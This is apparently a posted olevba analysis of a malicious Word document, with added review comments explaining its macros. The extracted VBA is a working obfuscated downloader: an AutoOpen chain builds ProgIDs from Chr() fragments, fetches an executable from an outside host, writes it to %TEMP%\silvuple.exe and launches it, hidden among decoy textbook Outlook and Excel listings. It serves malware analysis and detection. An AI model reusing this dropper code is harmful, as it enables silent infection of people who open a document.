dynamoo

Malicious Word macro

Jul 1st, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- compin~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: compin~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' Auto-executing entry point: Word runs AutoOpen as soon as the document is
      ' opened (the AutoExec row in the ANALYSIS table below). It does nothing
      ' itself except call Nip121ÖÊÂ3017 with a throwaway Double; that sub in turn
      ' calls px4vMaz62GyVze in Module2, which holds the actual download-and-run
      ' logic. The two empty hops between the trigger and the payload presumably
      ' exist to keep the entry point looking harmless to scanners.
  17.  
  18. Nip121ÖÊÂ3017 (5.003)
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Double)
      ' Second hop of the AutoOpen chain. FFFFF is never read; the only effect is
      ' the call to px4vMaz62GyVze (Module2), the downloader. The non-ASCII name is
      ' part of the obfuscation, not a typo in the report.
  23.  
  24. px4vMaz62GyVze
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
      ' Module-level state shared by the malicious helpers. Of the four, only
      ' lw6wgKatg is used in the visible code: px4vMaz62GyVze writes the drop path
      ' (%TEMP%\silvuple.exe) into it and A06WNXrxh reads it back to launch the
      ' file. VSvsdvve, FEveEv and VSeeve are not referenced anywhere shown here.
  40. Public VSvsdvve As Integer
  41. Public lw6wgKatg As String
  42. Public FEveEv As Double
  43. Public VSeeve As Long
  44.  
  45. '
  46. ' Listing 22.1. A procedure that enumerates the first- and
  47. ' second-level folders in the Outlook namespace.
  48. '
  49. Sub EnumerateFolders()
      ' NOTE(review): decoy. Nothing in the AutoOpen chain calls this; it reads as
      ' filler lifted from an Outlook VBA textbook ("Listing 22.1" above).
      ' ThisOutlookSession is an Outlook object and is presumably unresolved inside
      ' a Word project, so the body could not run here even if called.
  50.     '
  51.    ' Set up the namespace
  52.    '
  53.    Set ns = ThisOutlookSession.Session
  54.     '
  55.    ' Run through the first-level folders
  56.    '
  57.    For Each folder In ns.Folders
  58.         Debug.Print folder.Name
  59.         '
  60.        ' Run through the second-level folders, if any
  61.        '
  62.        If folder.Folders.Count > 1 Then
  63.             For Each subfolder In folder.Folders
  64.                 Debug.Print "   " & subfolder.Name
  65.             Next 'subfolder
  66.        End If
  67.     Next 'folder
  68.    Set ns = Nothing
  69. End Sub
  70. '
  71. ' Listing 22.2. A procedure to test the PickFolder method
  72. '
  73. Sub PickFolderTest()
      ' NOTE(review): decoy textbook listing (22.2), not referenced by the
      ' AutoOpen chain. Depends on the Outlook-only ThisOutlookSession object.
  74.     ' Set up the namespace
  75.    '
  76.    Set ns = ThisOutlookSession.Session
  77.     '
  78.    ' Display the Select Folder dialog box
  79.    '
  80.    Set folder = ns.PickFolder
  81.     '
  82.    ' Test the return value
  83.    '
  84.    If Not folder Is Nothing Then
  85.         MsgBox "You picked " & folder.Name
  86.     End If
  87. End Sub
  88. '
  89.  
  90. ' Listing 22.3. A procedure that toggles the Web view
  91. ' on and off for the currently displayed folder.
  92. '
  93. Sub ToggleWebView()
      ' NOTE(review): decoy textbook listing (22.3), not referenced by the
      ' AutoOpen chain. The object references r.exp / c.exp / a.exp are garbled
      ' (the original presumably used a single explorer variable), so this would
      ' fail at run time; it only exists to pad the module with plausible code.
  94.     '
  95.    ' Set up the namespace and get the explorer
  96.    '
  97.    Set ns = ThisOutlookSession.Session
  98.     '
  99.    ' Save the current folder
  100.    '
  101.    Set currFolder = r.exp.CurrentFolder
  102.     '
  103.    ' Move temporarily to the root
  104.    '
  105.    Set c.exp.CurrentFolder = ns.Folders(1)
  106.     '
  107.    ' Toggle Web view for the current folder
  108.    '
  109.    currFolder.WebViewOn = Not currFolder.WebViewOn
  110.     '
  111.    ' Return to the current folder
  112.    '
  113.    Set a.exp.CurrentFolder = currFolder
  114. End Sub
  115. '
  116. ' Listing 22.4. A Function that determines the
  117. ' e-mail address of the sender.
  118. '
  119. Function SenderAddress(msg As String) As String
       ' NOTE(review): decoy textbook listing (22.4), not referenced by the
       ' AutoOpen chain. msg is declared As String yet used as an object
       ' (y.msg.Reply), and y is undefined; the code is mangled filler.
  120.     '
  121.    ' Create a temporary reply
  122.    '
  123.    Set replyItem = y.msg.Reply
  124.     '
  125.    ' The Reply's "To" property holds the sender's address
  126.    '
  127.    SenderAddress = replyItem.To
  128.     Set replyItem = Nothing
  129. End Function
  130. '
  131. ' Use this procedure to test the SenderAddress function.
  132. '
  133. Sub SenderAddressTest()
       ' NOTE(review): decoy textbook listing, not referenced by the AutoOpen
       ' chain. Depends on the Outlook-only ThisOutlookSession object.
  134.     '
  135.    ' Set up the namespace and Inbox
  136.    '
  137.    Set ns = ThisOutlookSession.Session
  138.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  139.     '
  140.    ' Display the sender's address for a message
  141.    '
  142.    MsgBox SenderAddress(ib.Items(2))
  143. End Sub
  144. '
  145. ' Listing 22.5. A procedure that processes Inbox messages.
  146. '
  147.  
  148.  
  149.  
       ' Late-binding helper used by the malicious code: wraps CreateObject so that
       ' ProgIDs assembled from Chr() fragments (Shell.Application, Adodb.Stream,
       ' Microsoft.XMLHTTP, WScript.Shell) can be instantiated without the ProgID
       ' ever appearing as a literal. NVIEOIB is the ProgID; the function returns
       ' the created COM object. This is the olevba "CreateObject" hit.
  150. Public Function LKJNmJKILHB(NVIEOIB As String)
  151.  Set LKJNmJKILHB = CreateObject(NVIEOIB)
  152. End Function
  153. Sub ProcessInboxMessages()
       ' NOTE(review): decoy textbook listing (22.5), not referenced by the
       ' AutoOpen chain. Depends on the Outlook-only ThisOutlookSession object and
       ' Outlook enumerations (olImportanceHigh, olFlagMarked, olConfidential).
  154.     '
  155.    ' Set up the namespace
  156.    '
  157.    Set ns = ThisOutlookSession.Session
  158.     '
  159.    ' Get the default Inbox folder
  160.    '
  161.    Set ib = ns.GetDefaultFolder(olFolderInbox)
  162.     '
  163.    ' Run through each item in the Inbox
  164.    '
  165.    For Each msg In ib.Items
  166.         '
  167.        ' Flag important messages
  168.        '
  169.        If msg.Importance = olImportanceHigh Then
  170.             msg.FlagStatus = olFlagMarked
  171.             msg.FlagRequest = "Handle this, will ya!"
  172.             msg.FlagDueBy = Date + 7
  173.             msg.Importance = olImportanceNormal
  174.             msg.Save
  175.         End If
  176.         '
  177.        ' Look for expired flags
  178.        '
  179.        If msg.FlagDueBy < Date Then
  180.             msg.Display
  181.             MsgBox "The displayed message has an expired flag!"
  182.         End If
  183.         '
  184.        ' Move sensitive messages to "Confidential" folder
  185.        '
  186.        If msg.Sensitivity = olConfidential Then
  187.             msg.Move ns.Folders(1).Folders("Confidential")
  188.         End If
  189.     Next 'msg
  190. End Sub
  191.  
  192. '
  193. ' Listing 22.6. A procedure that sends an e-mail message
  194. '
  195. Sub SendAMessage()
       ' NOTE(review): decoy textbook listing (22.6), not referenced by the
       ' AutoOpen chain. "Applicy.ation" is a deliberately broken identifier, so
       ' this cannot run; the hard-coded recipient is the textbook author's
       ' example address, not an attacker IoC.
  196.     ' Set up the namespace
  197.    '
  198.    Set ns = ThisOutlookSession.Session
  199.     '
  200.    ' Create the new MailItem
  201.    '
  202.    Set msg = Applicy.ation.CreateItem(olMailItem)
  203.     '
  204.    ' Specify the recipient, subject, and body
  205.    ' and then send the message
  206.    '
  207.    With msg
  208.         '
  209.        ' Adjust the following address!
  210.        '
  211.        .Recipients.Add "bitbucket@mcfedries.com"
  212.         .Subject = "Just Testing"
  213.         .Body = "This is only a test"
  214.         .Send
  215.     End With
  216. End Sub
  217. '
  218.  
  219.  
  220. ' Listing 22.7. A procedure that creates a forwarded message
  221. ' and deletes any existing attachments before sending it.
  222. '
  223. Sub ForwardAndDeleteAttachments()
       ' NOTE(review): decoy textbook listing (22.7), not referenced by the
       ' AutoOpen chain. Depends on the Outlook-only ThisOutlookSession object; the
       ' recipient is the textbook author's example address, not an attacker IoC.
  224.     '
  225.    ' Set up the namespace and Inbox
  226.    '
  227.    Set ns = ThisOutlookSession.Session
  228.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  229.     '
  230.    ' Create the forwarded MailItem
  231.    '
  232.    Set msg = ib.Items(ib.Items.Count).Forward
  233.     With msg
  234.         '
  235.        ' Delete all the attachments
  236.        '
  237.        For Each att In .Attachments
  238.             att.Delete
  239.         Next 'att
  240.        '
  241.        ' Send it (change the address!)
  242.        '
  243.        .Recipients.Add "selene@mcfedries.com"
  244.         .Send
  245.     End With
  246. End Sub
  247. '
  248.  
  249. ' Listing 22.8. A procedure that stores a password
  250. ' in a folder's Description property.
  251. '
  252. Sub SetPassword()
       ' NOTE(review): decoy textbook listing (22.8), not referenced by the
       ' AutoOpen chain. Stores a plaintext "password" in a folder's Description
       ' property, which the gExplorer_BeforeFolderSwitch handler below compares
       ' against user input; a textbook demo, not a security control.
  253.     ' Set up the namespace
  254.    '
  255.    Set ns = ThisOutlookSession.Session
  256.     '
  257.    ' Save the password in the folder's Description property
  258.    '
  259.    Set folder = ns.Folders(1).Folders("Confidential")
  260.     folder.Description = "password"
  261. End Sub
  262.  
  263. '
  264. ' Listing 22.9. An event handler that asks the user for
  265. ' a password before switching to the "Confidential" folder.
  266. '
  267.  
  268.  
  269.  
       ' Launcher stage of the malicious chain. The Chr() fragments decode to the
       ' ProgID "Shell.Application"; the object's Open method is then called on
       ' lw6wgKatg, the module-level path (%TEMP%\silvuple.exe) that
       ' px4vMaz62GyVze filled in after the download, which executes the dropped
       ' file with its default handler. MmXQ1eLmZ is ignored and nothing is
       ' assigned to the function name, so the return value is Empty. Only ever
       ' reached through px4vMaz62GyVze's error handler (see that sub). This is the
       ' olevba "Open" hit for Module1.
  270. Public Function A06WNXrxh(MmXQ1eLmZ As String)
  271.  Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  272. d6eiGTziQd.Open (lw6wgKatg)
  273. End Function
  274. Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
       ' NOTE(review): decoy textbook listing (22.9), not referenced by the
       ' AutoOpen chain. A WithEvents handler for an Outlook explorer; gExplorer is
       ' never declared WithEvents in the visible code, so the event would never
       ' fire. Compares typed input against a plaintext folder property.
  275.     If NewFolder.Name = "Confidential" Then
  276.         pwd = InputBox("Please enter the password for this folder:")
  277.         If pwd <> NewFolder.Description Then
  278.             Cancel = True
  279.         End If
  280.     End If
  281. End Sub
  282. '
  283. ' Use this event handler to insure that the gExplorer
  284. ' global variable gets instantiated at startup
  285. '
  286. Private Sub Application_Startup()
       ' NOTE(review): decoy. Application_Startup is an Outlook event, and
       ' "Applicat.ion" is a deliberately broken identifier, so this never runs.
  287.     Set gExplorer = Applicat.ion.ActiveExplorer
  288. End Sub
  289. '
  290. ' Listing 22.10. An event handler for the MailItem object's Send event.
  291. '
  292. Private Sub gMailItem_Send(Cancel As Boolean)
       ' NOTE(review): decoy textbook listing (22.10), not referenced by the
       ' AutoOpen chain. Event handler for an Outlook MailItem; gMailItem is not
       ' declared WithEvents in the visible code.
  293.     Dim result As Integer
  294.     result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
  295.     If result = vbNo Then
  296.         gMailItem.DeleteAfterSubmit = True
  297.     End If
  298. End Sub
  299. '
  300. ' Listing 22.11. A procedure that sends an e-mail message and
  301. ' references the global gMailItem variable to trap events.
  302. '
  303. Sub SendAMessage2()
       ' NOTE(review): decoy textbook listing (22.11), not referenced by the
       ' AutoOpen chain. "Appl.ication" is a deliberately broken identifier, so
       ' this cannot run; the recipient is the textbook author's example address.
  304.     '
  305.    ' Set up the namespace
  306.    '
  307.    Set ns = ThisOutlookSession.Session
  308.     '
  309.    ' Create the new MailItem using the
  310.    ' gMailItem global variable
  311.    '
  312.    Set gMailItem = Appl.ication.CreateItem(olMailItem)
  313.     '
  314.    ' Specify the recipient, subject, and body
  315.    ' and then send the message
  316.    '
  317.    With gMailItem
  318.         '
  319.        ' Adjust the following address!
  320.        '
  321.        .Recipients.Add "bitbucket@mcfedries.com"
  322.         .Subject = "Just Testing Events"
  323.         .Body = "This is only an events test"
  324.         .Send
  325.     End With
  326. End Sub
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | Suspicious | Open           | May open a file                         |
  333. | Suspicious | Chr            | May attempt to obfuscate specific       |
  334. |            |                | strings                                 |
  335. | Suspicious | CreateObject   | May create an OLE object                |
  336. | Suspicious | Run            | May run an executable file or a system  |
  337. |            |                | command                                 |
  338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  339. |            |                | may be used to obfuscate strings        |
  340. |            |                | (option --decode to see all)            |
  341. +------------+----------------+-----------------------------------------+
  342. -------------------------------------------------------------------------------
  343. VBA MACRO Module2.bas
  344. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
  345. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  346. '
  347. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  348. '
  349. Sub GetNumbers()
       ' NOTE(review): decoy textbook listing (23.1), not referenced by the
       ' AutoOpen chain. Loops prompting for two values until Divide returns True.
  350.     Dim done As Boolean
  351.     Dim divisor As Variant
  352.     Dim dividend As Variant
  353.     '
  354.    ' Prompt user for dividend and divisor.
  355.    '
  356.    done = False
  357.     Do While Not done
  358.         dividend = InputBox("Enter the dividend:", "Divider")
  359.         divisor = InputBox("Enter the divisor:", "Divider")
  360.         done = Divide(dividend, divisor)
  361.     Loop
  362. End Sub
  363. '
  364.  
       ' Dropper stage of the malicious chain: writes raw bytes to disk. The Chr()
       ' fragments decode to the ProgID "Adodb.Stream". jIAuThroV99z is the byte
       ' array (the HTTP responseBody fetched in px4vMaz62GyVze) and dicVrTXgN the
       ' destination path (%TEMP%\silvuple.exe). .Type = 1 is adTypeBinary and the
       ' second SaveToFile argument 2 is adSaveCreateOverWrite, so an existing
       ' file at that path is silently replaced. No value is assigned to the
       ' function name. This produces the olevba Open/Write/SaveToFile hits for
       ' Module2.
  365. Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
  366. Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
  367.  
  368. With KKOWIPA
  369.    .Type = 1
  370.     .Open
  371.     .write jIAuThroV99z
  372.     .savetofile dicVrTXgN, 2
  373. End With
  374. End Function
  375.  
  376. ' Listing 23.2. The Divide function divides the dividend by the divisor.
  377. ' The function traps "division by zero" errors.
  378. '
  379. Function Divide(dividend, divisor) As Boolean
       ' NOTE(review): decoy textbook listing (23.2), not referenced by the
       ' AutoOpen chain. Returns True when the division succeeded or the user
       ' declines to retry, False when the user wants to try again.
  380.     Dim msg As String
  381.     Dim result As Single
  382.     '
  383.    ' Set the trap
  384.    '
  385.    On Error GoTo DivByZeroHandler
  386.     '
  387.    ' Perform the division
  388.    '
  389.    result = dividend / divisor
  390.     '
  391.    ' If it went okay, display the result
  392.    '
  393.    msg = dividend & _
  394.           " divided by " & _
  395.           divisor & _
  396.           " equals " & _
  397.           result
  398.     MsgBox msg
  399.     '
  400.    ' Set the return value and bypass the error handler
  401.    '
  402.    Divide = True
  403.     Exit Function
  404.     '
  405.    ' Code branches here if an error occurs
  406.    '
  407. DivByZeroHandler:
  408.     '
  409.    ' Display the error message
  410.    '
  411.    result = MsgBox("You entered 0 as the divisor! Try again?", _
  412.                     vbYesNo + vbQuestion, _
  413.                     "Divider")
  414.     '
  415.    ' Return the user's choice
  416.    '
  417.    If result = vbYes Then
  418.         Divide = False
  419.     Else
  420.         Divide = True
  421.     End If
  422. End Function
  423. '
  424. ' Listing 23.3 Backs up the active workbook to a drive specified by
  425.  
  426.  
  427. Sub px4vMaz62GyVze()
       ' Downloader / dropper / launcher: the only block in this document with
       ' real behaviour. Reached from AutoOpen -> Nip121ÖÊÂ3017 (ThisDocument).
       ' Every ProgID, method name and string is assembled from Chr() fragments and
       ' resolved at run time through CallByName and CreateObject (LKJNmJKILHB), so
       ' no readable keyword is present in the stream. Decoded, the sequence is:
       '   1. Microsoft.XMLHTTP: Open "GET", hxxp://demaiffe[.]be/75/85.exe, False
       '   2. WScript.Shell.Environment("Process")("TEMP") -> %TEMP%\silvuple.exe
       '   3. Send; read responseBody; write it to that path via VBveEPIB
       '   4. deliberately divide by zero so the error handler runs A06WNXrxh,
       '      which opens the dropped file through Shell.Application
       ' The textbook comment split around this sub ("Listing 23.3 ... specified
       ' by" above, "the user. Traps any errors ..." below) marks where it was
       ' spliced into the decoy module. Detection/pivot points: the olevba
       ' CallByName/Chr/Open/Write/SaveToFile hits, the decoded URL, the %TEMP%
       ' file name, and the XMLHTTP + Adodb.Stream + Shell.Application trio.
  428.  
       ' "Microsoft.XMLHTTP"
  429. Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
  430.  
       ' .Open "GET", "hxxp://demaiffe[.]be/75/85.exe", False  (synchronous request)
  431. CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
  432. , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
  433. , False
  434.  
       ' "WScript.Shell"
  435. Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
  436.  
       ' .Environment("Process") fetched as a property (VbGet)
  437. Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
  438.  
       ' reads the process-level TEMP variable
  439. mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
  440.  
       ' drop path: %TEMP%\silvuple.exe, stored in the module-level lw6wgKatg so
       ' that A06WNXrxh can launch it later
  441. lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
  442. Dim FLLSJmKUYRVHQ() As Byte
  443.  
       ' .Send  -- issues the GET
  444. CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
       ' .responseBody -- raw bytes of the download, then written to disk
  445. FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  446. VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg
       ' Control-flow obfuscation: 84 / 0 raises a run-time error on purpose so
       ' execution jumps to PA4FeaqAL; the launch step lives only in the error
       ' handler and never appears on the straight-line path.
  447. On Error GoTo PA4FeaqAL
  448.     a = 84 / 0
  449.   On Error GoTo 0
  450.  
  451. JRyXdhZR:
  452.   Exit Sub
  453. PA4FeaqAL:
       ' launches %TEMP%\silvuple.exe; the string argument is ignored by A06WNXrxh
  454.   A06WNXrxh ("AU7CVXKyNxAAi")
  455. Resume JRyXdhZR
  456. End Sub
  457.  
  458. ' the user. Traps any errors (such as having no disk in the drive).
  459. '
  460. Sub BackUpToFloppy()
       ' NOTE(review): decoy textbook listing (23.3), not referenced by the
       ' AutoOpen chain. Excel-flavoured (ActiveWorkbook) code dropped into a Word
       ' macro module; its header comment is split by the px4vMaz62GyVze sub above.
  461.     Dim backupDrive As String
  462.     Dim backupName As String
  463.     Dim msg As String
  464.     Dim done As Boolean
  465.     Dim result As Integer
  466.     '
  467.    ' Define the location of the error handler
  468.    '
  469.    On Error GoTo ErrorHandler
  470.     '
  471.    ' Initialize some variables and then loop
  472.    '
  473.    Application.DisplayAlerts = False
  474.     done = False
  475.     backupDrive = "A:"
  476.     While Not done
  477.         '
  478.        ' Get the drive to use for the backup
  479.        '
  480.        backupDrive = InputBox( _
  481.             Prompt:="Enter the drive letter for the backup:", _
  482.             Title:="Backup", _
  483.             Default:=backupDrive)
  484.         '
  485.        ' Check to see if OK was selected
  486.        '
  487.        If backupDrive <> "" Then
  488.             '
  489.            ' Make sure the backup drive contains a colon (:)
  490.            '
  491.            If InStr(backupDrive, ":") = 0 Then
  492.                 backupDrive = Left(backupDrive, 1) & ":"
  493.             End If
  494.             '
  495.            ' First, save the file
  496.            '
  497.            ActiveWorkbook.Save
  498.             '
  499.            ' Assume the backup will be successful,
  500.            ' so set done to True to exit the loop
  501.            '
  502.            done = True
  503.             '
  504.            ' Concatenate drive letter and workbook name
  505.            '
  506.            backupName = backupDrive & ActiveWorkbook.Name
  507.             '
  508.            ' Make a copy on the specified drive
  509.            '
  510.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  511.         Else
  512.             Exit Sub
  513.         End If
  514.     Wend
  515.     '
  516.    ' Bypass the error handler
  517.    '
  518.    Exit Sub
  519.     '
  520.    ' Code branches here if an error occurs
  521.    '
  522. ErrorHandler:
  523.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  524.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  525.           "letter, or Ignore to attempt the backup again."
  526.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  527.     Select Case result
  528.         Case vbAbort
  529.             done = True
  530.         Case vbRetry
  531.             done = False
  532.             Resume Next
  533.         Case vbIgnore
  534.             Resume
  535.     End Select
  536. End Sub
  537. '
  538. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  539.  
  540. ' errors: division by zero, overflow, and type mismatch.
  541. '
  542. Sub DivideNumbers()
       ' NOTE(review): decoy textbook listing (23.4), not referenced by the
       ' AutoOpen chain. Demonstrates Resume-to-label error handling for VBA
       ' errors 11 (division by zero), 6 (overflow) and 13 (type mismatch).
  543.     Dim msg As String
  544.     Dim result As Single
  545.     Dim divisor As Variant
  546.     Dim dividend As Variant
  547.     '
  548.    ' Set the trap
  549.    '
  550.    On Error GoTo DivByZeroHandler
  551.     '
  552.    ' Prompt user for the dividend
  553.    '
  554. GetDividendAndDivisor:
  555.     dividend = InputBox("Enter the dividend:", "Divider")
  556.     If dividend = "" Then Exit Sub
  557.     '
  558.    ' Prompt user for the divisor
  559.    '
  560. GetDivisorOnly:
  561.     divisor = InputBox("Enter the divisor:", "Divider")
  562.     If divisor = "" Then Exit Sub
  563.     '
  564.    ' Perform the division
  565.    '
  566.    result = dividend / divisor
  567.     '
  568.    ' If it went okay, display the result
  569.    '
  570.    msg = dividend & _
  571.           " divided by " & _
  572.           divisor & _
  573.           " equals " & _
  574.           result
  575.     MsgBox msg
  576.     '
  577.    ' Bypass the error handler
  578.    '
  579.    Exit Sub
  580.     '
  581.    ' Code branches here if an error occurs
  582.    '
  583. DivByZeroHandler:
  584.     '
  585.    ' Display the error message
  586.    '
  587.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  588.           "Error number:  " & Err.Number & Chr(13) & _
  589.           "Error message: " & Err.Description
  590.     MsgBox msg, vbOKOnly + vbCritical
  591.     '
  592.    ' Check the error number
  593.    '
  594.    Select Case Err.Number
  595.         '
  596.        ' Division by zero
  597.        '
  598.        Case 11
  599.             Resume GetDivisorOnly
  600.         '
  601.        ' Overflow
  602.        '
  603.        Case 6
  604.             Resume GetDividendAndDivisor
  605.         '
  606.        ' Type mismatch
  607.        '
  608.        Case 13
  609.             If Not IsNumeric(dividend) Then
  610.                 Resume GetDividendAndDivisor
  611.             Else
  612.                 Resume GetDivisorOnly
  613.             End If
  614.         '
  615.        ' Anything else, just quit
  616.        '
  617.        Case Else
  618.             Exit Sub
  619.     End Select
  620. End Sub
  621.  
  622. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  623. ANALYSIS:
  624. +------------+------------+-----------------------------------------+
  625. | Type       | Keyword    | Description                             |
  626. +------------+------------+-----------------------------------------+
  627. | Suspicious | Open       | May open a file                         |
  628. | Suspicious | Chr        | May attempt to obfuscate specific       |
  629. |            |            | strings                                 |
  630. | Suspicious | SaveToFile | May create a text file                  |
  631. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  632. |            |            | function calls                          |
  633. | Suspicious | Write      | May write to a file (if combined with   |
  634. |            |            | Open)                                   |
  635. +------------+------------+-----------------------------------------+